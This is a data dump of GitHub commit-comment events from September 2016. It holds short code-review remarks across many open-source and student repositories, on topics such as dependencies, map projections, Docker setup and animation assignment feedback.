{"id":"4549613692","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18985562,"position":null,"line":null,"path":null,"commit_id":"e10a3b9ad00cbdd3d25a805356ba56a0f1bc3927","created_at":"2016-09-12T14:25:29Z","updated_at":"2016-09-12T14:25:29Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;NgSFow7z&#x2F;60-create-user-path\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create User Path</a>"}},"created_at":"2016-09-12T14:25:29Z"}
{"id":"4549614098","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18985563,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-12T14:25:33Z","updated_at":"2016-09-12T14:25:33Z","body":"@abisz this is in case we don't want to display station states. It might be that station states are not important for some Mobidul modes, such as the default mode, where stations only have the open state.\r\n\r\nI'm not sure it worked just yet."}},"created_at":"2016-09-12T14:25:33Z"}
{"id":"4549617590","type":"CommitCommentEvent","actor":{"login":"bonkey"},"repo":{"name":"zalando-incubator/atlas-ios"},"payload":{"comment":{"id":18985574,"position":16,"line":25,"path":"AtlasDemo/AtlasDemoUITests/AtlasDemoUITests.swift","commit_id":"d3eb45a65e244b5fa04ba5daf46e1fec6c28d13b","created_at":"2016-09-12T14:26:07Z","updated_at":"2016-09-12T14:26:07Z","body":"Does it pass those launchArguments this way??"}},"created_at":"2016-09-12T14:26:07Z"}
{"id":"4549619059","type":"CommitCommentEvent","actor":{"login":"etj27"},"repo":{"name":"ebeshero/DHClass-Hub"},"payload":{"comment":{"id":18985577,"position":null,"line":null,"path":null,"commit_id":"34634a29065e4c1671faf98b66c85709853f4be9","created_at":"2016-09-12T14:26:20Z","updated_at":"2016-09-12T14:26:20Z","body":"Yeah this was just me doing the github prject last minute.  I didn't put it in sandbox.  RIP.  xd xd xd xd xd"}},"created_at":"2016-09-12T14:26:20Z"}
{"id":"4549620049","type":"CommitCommentEvent","actor":{"login":"YashonHu"},"repo":{"name":"zhx19940113/canal-es"},"payload":{"comment":{"id":18985580,"position":null,"line":null,"path":null,"commit_id":"a521aada6c77a59d8f9f9503b5bea80ca1ffa5ff","created_at":"2016-09-12T14:26:30Z","updated_at":"2016-09-12T14:26:30Z","body":"你这个项目做的如何了，我们也需要做同样的功能。"}},"created_at":"2016-09-12T14:26:30Z"}
{"id":"4549627005","type":"CommitCommentEvent","actor":{"login":"DracoMilesX"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18985603,"position":null,"line":null,"path":null,"commit_id":"6a983bc8bec2f81063f2b4f40dd4ca0a5820ab34","created_at":"2016-09-12T14:27:39Z","updated_at":"2016-09-12T14:27:39Z","body":"You forgot to include the pokedex module."}},"created_at":"2016-09-12T14:27:39Z"}
{"id":"4549627494","type":"CommitCommentEvent","actor":{"login":"benrudolph"},"repo":{"name":"dimagi/commcare-core"},"payload":{"comment":{"id":18985604,"position":13,"line":144,"path":"api/org/commcare/api/json/PromptToJson.java","commit_id":"da4b5171678182050628ab8b86fcb701f9def989","created_at":"2016-09-12T14:27:43Z","updated_at":"2016-09-12T14:27:43Z","body":"leaving a note here that this is what a submitted form looks like: \r\n```xml\r\n    <date>2016-09-05</date>\r\n\t<time_question>18:00:00.000-05</time_question>\r\n\t<datetime_question>2016-09-01T16:18:00.000-04</datetime_question>\r\n\t<n0:meta xmlns:n0=\"http://openrosa.org/jr/xforms\">\r\n\t\t<n0:deviceID>Formplayer</n0:deviceID>\r\n\t\t<n0:timeStart>2016-09-11T16:18:45.725-04</n0:timeStart>\r\n\t\t<n0:timeEnd>2016-09-11T16:41:15.961-04</n0:timeEnd>\r\n\t\t<n0:username>brudolph@dimagi.com</n0:username>\r\n\t\t<n0:userID>8d7a5c6e0e1af478aca5a39bebe5317c</n0:userID>\r\n\t\t<n0:instanceID>8f969d99-ee66-4205-a9b3-aab5dd992f53</n0:instanceID>\r\n\t\t<n1:appVersion xmlns:n1=\"http://commcarehq.org/xforms\">Formplayer Version: 2.27</n1:appVersion>\r\n\t</n0:meta>\r\n```"}},"created_at":"2016-09-12T14:27:43Z"}
{"id":"4549628082","type":"CommitCommentEvent","actor":{"login":"jeremy-schweitzer"},"repo":{"name":"danpoltawski/enrol_autoenrol"},"payload":{"comment":{"id":18985607,"position":null,"line":null,"path":null,"commit_id":"f6f4b3cac63d31fa785c698ef22d55c7465fc227","created_at":"2016-09-12T14:27:49Z","updated_at":"2016-09-12T14:27:49Z","body":"I appreciate it. If there's a pull request I can at least use that to grab the code, even if the original developer seems to have stopped working on the plugin.  It is very useful - especially for corporate environments where we don't have an SIS. "}},"created_at":"2016-09-12T14:27:49Z"}
{"id":"4549631580","type":"CommitCommentEvent","actor":{"login":"bonkey"},"repo":{"name":"zalando-incubator/atlas-ios"},"payload":{"comment":{"id":18985613,"position":16,"line":25,"path":"AtlasDemo/AtlasDemoUITests/AtlasDemoUITests.swift","commit_id":"d3eb45a65e244b5fa04ba5daf46e1fec6c28d13b","created_at":"2016-09-12T14:28:23Z","updated_at":"2016-09-12T14:28:23Z","body":"Obviously not: http://drekka.ghost.io/xcuiapplication-youre-probably-doing-it-wrong/"}},"created_at":"2016-09-12T14:28:23Z"}
{"id":"4549635979","type":"CommitCommentEvent","actor":{"login":"ssteinerx"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":18985616,"position":null,"line":null,"path":null,"commit_id":"9f2fa4a0a91a55f2c565661556e2f55a47ad400d","created_at":"2016-09-12T14:29:05Z","updated_at":"2016-09-12T14:29:05Z","body":"Docker for Mac is not a direct substitute for running Docker in VirtualBox or on a real separate machine.  There are layout inconsistencies on the Mac that make it really difficult to make a distribution setup that is deployable to a real Docker installation on e.g. Debian or Alpine.\r\n\r\nI don't think this should be removed at all (for now).  \r\n\r\nI also think that the whole Docker setup &c. should be a mixin, but that's a topic for another time."}},"created_at":"2016-09-12T14:29:05Z"}
{"id":"4549640693","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18985627,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T14:29:49Z","updated_at":"2016-09-12T14:29:49Z","body":"As far as I know, Google maps, OSM etc. dont use UTM (since that wouldn't work) but rather [Web Mercator](https://en.wikipedia.org/wiki/Web_Mercator), a variation of the standard Mercator projection. This project uses the [mercator-projection](https://github.com/zacbarton/node-mercator-projection) module which is based on [Google's docs](https://developers.google.com/maps/documentation/javascript/maptypes#WorldCoordinates), so I'm assuming that it's also using Web Mercator.\r\nI have to admit that I should probably add a note that the used Mercator projection is Web \"flavoured\"."}},"created_at":"2016-09-12T14:29:49Z"}
{"id":"4549646725","type":"CommitCommentEvent","actor":{"login":"kroniak"},"repo":{"name":"tmenier/Flurl"},"payload":{"comment":{"id":18985643,"position":22,"line":42,"path":"Build/nuspec/Flurl.nuspec","commit_id":"834df5126aa855c05f50d4a96fc5cf4b97dfa3a5","created_at":"2016-09-12T14:30:44Z","updated_at":"2016-09-12T14:30:44Z","body":"No. CultureInfo depends on it."}},"created_at":"2016-09-12T14:30:44Z"}
{"id":"4549647983","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18985647,"position":null,"line":null,"path":null,"commit_id":"42c89e64a9df2cf4d1d8780021b7f2d89819ed2f","created_at":"2016-09-12T14:30:55Z","updated_at":"2016-09-12T14:30:55Z","body":"++"}},"created_at":"2016-09-12T14:30:55Z"}
{"id":"4549652298","type":"CommitCommentEvent","actor":{"login":"krieghof"},"repo":{"name":"solus-project/budgie-desktop"},"payload":{"comment":{"id":18985662,"position":null,"line":null,"path":null,"commit_id":"2c69a58307f5234cbfee6cb377961c2c41bd8e01","created_at":"2016-09-12T14:31:35Z","updated_at":"2016-09-12T14:31:35Z","body":"Is this already in the stable repos? Because for me the OSD is still drunk"}},"created_at":"2016-09-12T14:31:35Z"}
{"id":"4549654053","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-wendzb"},"payload":{"comment":{"id":18985668,"position":null,"line":null,"path":null,"commit_id":"bff736f6793e7e8daf39ff87723f33af5cdea362","created_at":"2016-09-12T14:31:51Z","updated_at":"2016-09-12T14:31:51Z","body":"looking good.  You can add some more detail in your notes / thumnails that will help in the animation.  The two balls seem close in weight, but different in size and in bounciness, so keep that in mind - you will probably need to exaggerate the difference between them to make them distinct.  The Pokeball has a longer hang time at the top of its bounces, but the overall bounce time is shorter; while the tennis ball goes further, and faster, with longer bounces.  Working with the _spacing_ throughout the bounce will be important, so make some notes/thumbnails on spacing in addition to the timing.  \r\nIs there squash and stretch?  Can you push the squash and stretch? \r\nBe careful with the distances in your sketches, keep in mind the camera angle in your video, and remember that you don't necessarily want to follow the video literally but use it to understand the motion."}},"created_at":"2016-09-12T14:31:51Z"}
{"id":"4549655076","type":"CommitCommentEvent","actor":{"login":"torkiljohnsen"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18985673,"position":9,"line":188,"path":"tests/TranslatorTest.php","commit_id":"12b2163e85ff8dc1cd6acd674140e575127640cd","created_at":"2016-09-12T14:32:00Z","updated_at":"2016-09-12T14:32:00Z","body":"Indeed\nman. 12. sep. 2016 kl. 16.22 skrev Vincent Klaiber <notifications@github.com\n>:\n\n> Then we've to rewrite the method to check for translated attributes. Might\n> be better actually. I'll look into it.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vinkla/laravel-translator/commit/12b2163e85ff8dc1cd6acd674140e575127640cd#commitcomment-18985500>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATaiWXZd60gu1uiXqgoQZf4Pkjzlozgks5qpV-ZgaJpZM4J6nGw>\n> .\n>\n"}},"created_at":"2016-09-12T14:32:00Z"}
{"id":"4549655298","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":18985674,"position":29,"line":63,"path":"dnf/automatic/main.py","commit_id":"590a3b0f455ff709185ec081ab873b6b600bc4a7","created_at":"2016-09-12T14:32:03Z","updated_at":"2016-09-12T14:32:03Z","body":"this should give some proper error (or silently ignored, not sure)."}},"created_at":"2016-09-12T14:32:03Z"}
{"id":"4549655958","type":"CommitCommentEvent","actor":{"login":"sertansenturk"},"repo":{"name":"sertansenturk/makammusicbrainz"},"payload":{"comment":{"id":18985675,"position":null,"line":null,"path":null,"commit_id":"3938ce36ba7c2725e3e7bfaba63d36b152193cdb","created_at":"2016-09-12T14:32:11Z","updated_at":"2016-09-12T14:32:11Z","body":"Fixes the issue reported at https://github.com/MTG/dunya/issues/374#issuecomment-246345871"}},"created_at":"2016-09-12T14:32:11Z"}
{"id":"4549656511","type":"CommitCommentEvent","actor":{"login":"kroniak"},"repo":{"name":"tmenier/Flurl"},"payload":{"comment":{"id":18985677,"position":22,"line":42,"path":"Build/nuspec/Flurl.nuspec","commit_id":"834df5126aa855c05f50d4a96fc5cf4b97dfa3a5","created_at":"2016-09-12T14:32:15Z","updated_at":"2016-09-12T14:32:15Z","body":"I will move this dependence to \"System.Globalization\": \"4.0.11\" "}},"created_at":"2016-09-12T14:32:15Z"}
{"id":"4549657545","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18985680,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T14:32:24Z","updated_at":"2016-09-12T14:32:24Z","body":"> As far as I know, Google maps, OSM etc. dont use UTM (since that wouldn't work) […].\r\n\r\nHow would that not work?"}},"created_at":"2016-09-12T14:32:24Z"}
{"id":"4549659896","type":"CommitCommentEvent","actor":{"login":"tobiasjakobi"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":18985685,"position":null,"line":null,"path":null,"commit_id":"c15764101943e93ea9e8223596d8a6a2571494c3","created_at":"2016-09-12T14:32:45Z","updated_at":"2016-09-12T14:32:45Z","body":"Any chance to reintroduce some option to select the track range again?"}},"created_at":"2016-09-12T14:32:45Z"}
{"id":"4549660089","type":"CommitCommentEvent","actor":{"login":"sigfridumest"},"repo":{"name":"simanl/air-quality-forecasts"},"payload":{"comment":{"id":18985686,"position":null,"line":null,"path":null,"commit_id":"549a7c81bc6116da6f6d0725a2dc1bd917dcb2b1","created_at":"2016-09-12T14:32:47Z","updated_at":"2016-09-12T14:32:47Z","body":"@vovimayhem \r\nSe hicieron unos cambios para que la tabla de salida ponga NAs cuando no hay información suficiente para pronosticar."}},"created_at":"2016-09-12T14:32:47Z"}
{"id":"4549665539","type":"CommitCommentEvent","actor":{"login":"brauliobo"},"repo":{"name":"noosfero/noosfero"},"payload":{"comment":{"id":18985696,"position":null,"line":null,"path":null,"commit_id":"4daba0e28073dbacbd58ec88bc2db27217e6b7c7","created_at":"2016-09-12T14:33:40Z","updated_at":"2016-09-12T14:33:40Z","body":"wow, what a typo!"}},"created_at":"2016-09-12T14:33:40Z"}
{"id":"4549665654","type":"CommitCommentEvent","actor":{"login":"yiavhgyl"},"repo":{"name":"logiceditor-com/coding-guidelines"},"payload":{"comment":{"id":18985698,"position":null,"line":null,"path":null,"commit_id":"6a65cb3745bff0ba0eb5d49f4c3e380494889800","created_at":"2016-09-12T14:33:41Z","updated_at":"2016-09-12T14:33:41Z","body":"Typo \"составлегии\"."}},"created_at":"2016-09-12T14:33:41Z"}
{"id":"4549665813","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-Phhase"},"payload":{"comment":{"id":18985699,"position":null,"line":null,"path":null,"commit_id":"b574b23255757eb18205aca3ba68cf43095e5973","created_at":"2016-09-12T14:33:43Z","updated_at":"2016-09-12T14:33:43Z","body":"Good reference video.  Needs thumbnail sketches."}},"created_at":"2016-09-12T14:33:43Z"}
{"id":"4549676829","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18985727,"position":29,"line":29,"path":"package.json","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T14:35:29Z","updated_at":"2016-09-12T14:35:29Z","body":"> As far as I can see, the 2nd paragraph is included?\r\n\r\nYou're right.\r\n\r\n> And the title doesn't make a difference since it won't change the formal license description, or does it?\r\n\r\n[It does apparently](https://github.com/Microsoft/ChakraCore/issues/76#issuecomment-171540931). Nevertheless, the license text *without* the heading line is usually referred to by \"ISC\", whereas the license text *with* is referred to by \"MIT\". I suggest to correct either the first line or the `license` field."}},"created_at":"2016-09-12T14:35:29Z"}
{"id":"4549683607","type":"CommitCommentEvent","actor":{"login":"noscripter"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18985746,"position":null,"line":null,"path":null,"commit_id":"8d77e89d65d5678d3c9b15496e462ab5b8ebd8e9","created_at":"2016-09-12T14:36:33Z","updated_at":"2016-09-12T14:36:33Z","body":"This commit cause following errors:\r\n\r\n```\r\nError detected while processing FileType Auto commands for \"*\":\r\nE117: Unknown function: UltiSnips#FileTypeChanged\r\n```"}},"created_at":"2016-09-12T14:36:33Z"}
{"id":"4549684784","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-Phhase"},"payload":{"comment":{"id":18985754,"position":null,"line":null,"path":null,"commit_id":"b574b23255757eb18205aca3ba68cf43095e5973","created_at":"2016-09-12T14:36:43Z","updated_at":"2016-09-12T14:36:43Z","body":"You should re-shoot the video for the golf ball.  It's too blurry and shakey to be much use. \r\n- keep the camera steady: use a tripod or at least prop it on something. \r\n- shoot from further back so the ball stays in frame\r\n- shoot against a neutral background\r\n- do not shoot with something bright in the background, like your laptop monitor, the backlighting will be hard for the camera to deal with\r\n- shoot in bright light.  outdoors on a sunny day or with strong light on the ball.  lower light levels make the camera use a lower frame rate, which makes the video blurry, which makes it not useful for animation reference particularly with fast moving objects."}},"created_at":"2016-09-12T14:36:43Z"}
{"id":"4549685020","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18985755,"position":193,"line":226,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/internal/PhenotipsFamilyPermissions.java","commit_id":"a77b3a211b232a33f54e6517bd2b0b5968627c9a","created_at":"2016-09-12T14:36:45Z","updated_at":"2016-09-12T14:36:45Z","body":"This is not an error, do we need this at all? Looks like it's spamming console"}},"created_at":"2016-09-12T14:36:45Z"}
{"id":"4549688155","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18985763,"position":null,"line":null,"path":null,"commit_id":"f63f18d8417f5ad26520dc639cfab3224a9ee1c6","created_at":"2016-09-12T14:37:17Z","updated_at":"2016-09-12T14:37:17Z","body":"Haha, okay. Why the removal of the delete selected page, does the warning not work on the associated confirmation page there?"}},"created_at":"2016-09-12T14:37:17Z"}
{"id":"4549690149","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18985768,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T14:37:37Z","updated_at":"2016-09-12T14:37:37Z","body":"UTM isn't a global projection. Like Gauß-Krüger, it divides the earth into different zones which you can project, but you can't simply combine them after applying the projection (as far as I understand)."}},"created_at":"2016-09-12T14:37:37Z"}
{"id":"4549691606","type":"CommitCommentEvent","actor":{"login":"tmenier"},"repo":{"name":"tmenier/Flurl"},"payload":{"comment":{"id":18985772,"position":22,"line":42,"path":"Build/nuspec/Flurl.nuspec","commit_id":"834df5126aa855c05f50d4a96fc5cf4b97dfa3a5","created_at":"2016-09-12T14:37:50Z","updated_at":"2016-09-12T14:37:50Z","body":"If it's necessary, no problem at all. I've seen unnecessary dependencies get added to projects accidentally before, so just wanted to make sure :)"}},"created_at":"2016-09-12T14:37:50Z"}
{"id":"4549691627","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18985773,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T14:37:50Z","updated_at":"2016-09-12T14:37:50Z","body":"no problem about being able to update views via plugin, it's just about firing a new event in qanda here:\r\nhttps://github.com/LimeSurvey/LimeSurvey/blob/master/application/helpers/qanda_helper.php#L6287\r\n\r\nBut keep in mind that in future Question Object will have their own views."}},"created_at":"2016-09-12T14:37:50Z"}
{"id":"4549693524","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":18985777,"position":29,"line":63,"path":"dnf/automatic/main.py","commit_id":"590a3b0f455ff709185ec081ab873b6b600bc4a7","created_at":"2016-09-12T14:38:10Z","updated_at":"2016-09-12T14:38:10Z","body":"actually such things probably should be raised during config parsing."}},"created_at":"2016-09-12T14:38:10Z"}
{"id":"4549694062","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18985779,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-12T14:38:15Z","updated_at":"2016-09-12T14:38:15Z","body":"I hope this passes! \r\nOnce committed IMO we might exploit si->blockersForKing for evaluation.\r\nFollowing [test](http://tests.stockfishchess.org/tests/view/57d002ab0ebc59030fbe5000) failed with positive score although it had to fight against the trade-off of introducing si->blockersForKing and although it applied a bonus on pinners which were merely 'potential'."}},"created_at":"2016-09-12T14:38:15Z"}
{"id":"4549694847","type":"CommitCommentEvent","actor":{"login":"edgester"},"repo":{"name":"martialblog/puppet-module-kerberos"},"payload":{"comment":{"id":18985782,"position":14,"line":14,"path":"spec/acceptance/client_spec.rb","commit_id":"735005330ddd4a26445359c64acac52819772431","created_at":"2016-09-12T14:38:21Z","updated_at":"2016-09-12T14:38:21Z","body":"Please set allow_weak_crypto to false or remove it. It shouldn't be needed. Even OpenAFS doesn't need it any more."}},"created_at":"2016-09-12T14:38:21Z"}
{"id":"4549696630","type":"CommitCommentEvent","actor":{"login":"gitavery"},"repo":{"name":"githubschool/open-enrollment-classes-nisse"},"payload":{"comment":{"id":18985786,"position":null,"line":null,"path":null,"commit_id":"0b34e17b4bd18ee4e84d0e4f0bf4685f18f5c3f9","created_at":"2016-09-12T14:38:37Z","updated_at":"2016-09-12T14:38:37Z","body":"``<a href=\"http://www.latlong.net/c/?lat=34.949567&long=-81.932048\" target=\"_blank\">(34.949567, -81.932048)</a>"}},"created_at":"2016-09-12T14:38:37Z"}
{"id":"4549699470","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18985790,"position":88,"line":88,"path":"Projects/Common/FiresecServiceAPI/Extensions/DateTimeExtensions.cs","commit_id":"d57ed91223dab43b32d540a6b6b753f40e5aa706","created_at":"2016-09-12T14:39:04Z","updated_at":"2016-09-12T14:39:04Z","body":"Неверная реализация. Т.к. если встать на конец января и вызвать данную функцию, то попадем в начало марта, а не февраль"}},"created_at":"2016-09-12T14:39:04Z"}
{"id":"4549700457","type":"CommitCommentEvent","actor":{"login":"edgester"},"repo":{"name":"martialblog/puppet-module-kerberos"},"payload":{"comment":{"id":18985798,"position":4,"line":6,"path":".gitignore","commit_id":"735005330ddd4a26445359c64acac52819772431","created_at":"2016-09-12T14:39:13Z","updated_at":"2016-09-12T14:39:13Z","body":"Please add the missing newline to the end of .gitignore."}},"created_at":"2016-09-12T14:39:13Z"}
{"id":"4549702790","type":"CommitCommentEvent","actor":{"login":"billho"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":18985807,"position":null,"line":null,"path":null,"commit_id":"c3549a5c261b3a0803920182cc03194049f760b4","created_at":"2016-09-12T14:39:35Z","updated_at":"2016-09-12T14:39:35Z","body":"Got it！"}},"created_at":"2016-09-12T14:39:35Z"}
{"id":"4549706865","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18985816,"position":null,"line":null,"path":null,"commit_id":"b84f3443834f10965bdb37f3fea016c317097c83","created_at":"2016-09-12T14:40:18Z","updated_at":"2016-09-12T14:40:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SoWqL6r3T2ylfsC6u_7y5w"}},"created_at":"2016-09-12T14:40:18Z"}
{"id":"4549709493","type":"CommitCommentEvent","actor":{"login":"jasoncwilley"},"repo":{"name":"Upper-Polo/todo_list"},"payload":{"comment":{"id":18985820,"position":null,"line":null,"path":null,"commit_id":"0089402de002501f9a7c6437ca33b942444cee51","created_at":"2016-09-12T14:40:42Z","updated_at":"2016-09-12T14:40:42Z","body":"After thinking about this on my way in this morning I think it is not correct.  The code I added will print the current date and time every time it is run.  I believe we need to store it the first time it is run  when the item is marked \"Done.\" i'll look into this and see about writing it to a file that can be recalled later.  It might be easiest to store the timestamp data (date/time item created, and marked completed in a file along with the item description. "}},"created_at":"2016-09-12T14:40:42Z"}
{"id":"4549715104","type":"CommitCommentEvent","actor":{"login":"vermiculus"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":18985831,"position":4,"line":2216,"path":"ivy.el","commit_id":"9b13aa466e3370b52e536c7c1a290d924d488ee9","created_at":"2016-09-12T14:41:33Z","updated_at":"2016-09-12T14:41:33Z","body":"Hmm, shouldn't this be a `defcustom`?"}},"created_at":"2016-09-12T14:41:33Z"}
{"id":"4549716951","type":"CommitCommentEvent","actor":{"login":"koa"},"repo":{"name":"maximilianhuber/fossology"},"payload":{"comment":{"id":18985835,"position":null,"line":null,"path":null,"commit_id":"453c3f0882d0cfbfbe71f369c6f7a20e3bc967ac","created_at":"2016-09-12T14:41:51Z","updated_at":"2016-09-12T14:41:51Z","body":"I have implemented a alternate solution: https://github.com/koa/fossology/commit/3dbc7a81ff0d311035cf8e938f8600403e7926db"}},"created_at":"2016-09-12T14:41:51Z"}
{"id":"4549720871","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18985850,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T14:42:30Z","updated_at":"2016-09-12T14:42:30Z","body":"Yes, no problem. In fact plugin can already update and do their own views for {ANSWER}. But i don't know if it can be great to allow it more easily for another plugin dev.\r\n\r\nIn fact it must be\r\n\r\n1. This template\r\n2. (option, in dev, when it's ready) Parent template\r\n3. (option, in dev, when it's ready, if it can be cool) Plugin views (or not ?)\r\n4. Question Object\r\n\r\n"}},"created_at":"2016-09-12T14:42:30Z"}
{"id":"4549723236","type":"CommitCommentEvent","actor":{"login":"slaff"},"repo":{"name":"igrr/axtls-8266"},"payload":{"comment":{"id":18985855,"position":35,"line":230,"path":"ssl/tls1_clnt.c","commit_id":"a6822065238f35cb3bc10bf9645b644a79dc8013","created_at":"2016-09-12T14:42:51Z","updated_at":"2016-09-12T14:42:51Z","body":"Setting the SNI hostname seems to be removed in the new code. Was this forgotten or there is a reason for it?"}},"created_at":"2016-09-12T14:42:51Z"}
{"id":"4549725233","type":"CommitCommentEvent","actor":{"login":"jbodwell"},"repo":{"name":"WianVos/lm-wlp-plugin"},"payload":{"comment":{"id":18985857,"position":null,"line":null,"path":null,"commit_id":"c06169441b27dcbff1380a2ab6aeb681365f0527","created_at":"2016-09-12T14:43:11Z","updated_at":"2016-09-12T14:43:11Z","body":"The corresponding artifactory callback scripts are missing."}},"created_at":"2016-09-12T14:43:11Z"}
{"id":"4549730249","type":"CommitCommentEvent","actor":{"login":"yibrah"},"repo":{"name":"yibrah/MIT-Projects"},"payload":{"comment":{"id":18985865,"position":4,"line":4,"path":"index.php","commit_id":"fddf8ab5c44c990724f735aa2e7fd681ae814371","created_at":"2016-09-12T14:43:57Z","updated_at":"2016-09-12T14:43:57Z","body":"hello"}},"created_at":"2016-09-12T14:43:57Z"}
{"id":"4549730823","type":"CommitCommentEvent","actor":{"login":"xxFlare"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18985868,"position":null,"line":null,"path":null,"commit_id":"bf910d3e97060817b5660559cfbf675f26189f7b","created_at":"2016-09-12T14:44:02Z","updated_at":"2016-09-12T14:44:02Z","body":"<3 PhP Storm"}},"created_at":"2016-09-12T14:44:02Z"}
{"id":"4549732686","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-JessiCartoons"},"payload":{"comment":{"id":18985872,"position":null,"line":null,"path":null,"commit_id":"68763a947c7f299bfc86dcaf1e3092a8dffdfc5e","created_at":"2016-09-12T14:44:21Z","updated_at":"2016-09-12T14:44:21Z","body":"good reference videos.  two notes:\r\n- keep the ball in frame - shoot from further back so you don't have to move the camera\r\n- the soccer ball one looks like it's in slow motion, is that really the normal speed?\r\n\r\nthumbnails - good detail on the spacing, but take another look at the arcs.  they look asymmetrical, where on each bounce the fall is steeper than the rise.  particularly the soccer ball sketch.  in reality this is really unlikely, so try and figure out if that's really what's going on or an artifact of the video.  in the playblast it looks unnatural."}},"created_at":"2016-09-12T14:44:21Z"}
{"id":"4549734518","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":18985875,"position":4,"line":2216,"path":"ivy.el","commit_id":"9b13aa466e3370b52e536c7c1a290d924d488ee9","created_at":"2016-09-12T14:44:34Z","updated_at":"2016-09-12T14:44:34Z","body":"> Hmm, shouldn't this be a defcustom?\r\n\r\nI don't want Ivy to depend on Hydra. It's a `defvar` so that the user can see that `(require 'lv)` must succeed.\r\n\r\n"}},"created_at":"2016-09-12T14:44:34Z"}
{"id":"4549737687","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18985883,"position":null,"line":null,"path":null,"commit_id":"8d77e89d65d5678d3c9b15496e462ab5b8ebd8e9","created_at":"2016-09-12T14:45:03Z","updated_at":"2016-09-12T14:45:03Z","body":"@noscript \r\nThe function has been removed, because it is not required anymore.\r\nAre you defining the `autocmd` yourself, or is it defined from another plugin?"}},"created_at":"2016-09-12T14:45:03Z"}
{"id":"4549740060","type":"CommitCommentEvent","actor":{"login":"waterlooSunset"},"repo":{"name":"bastienEichenberger/extendscript-library"},"payload":{"comment":{"id":18985890,"position":null,"line":null,"path":null,"commit_id":"7adf281d7d5afbbdab29320c1810b7bc5239fdab","created_at":"2016-09-12T14:45:27Z","updated_at":"2016-09-12T14:45:27Z","body":"Closes issue #5 by renaming .write and .read helper functions to .readUTF8 and .writeUTF8 so that they do not overwrite the native ExtendScript methods .write() and .read()"}},"created_at":"2016-09-12T14:45:27Z"}
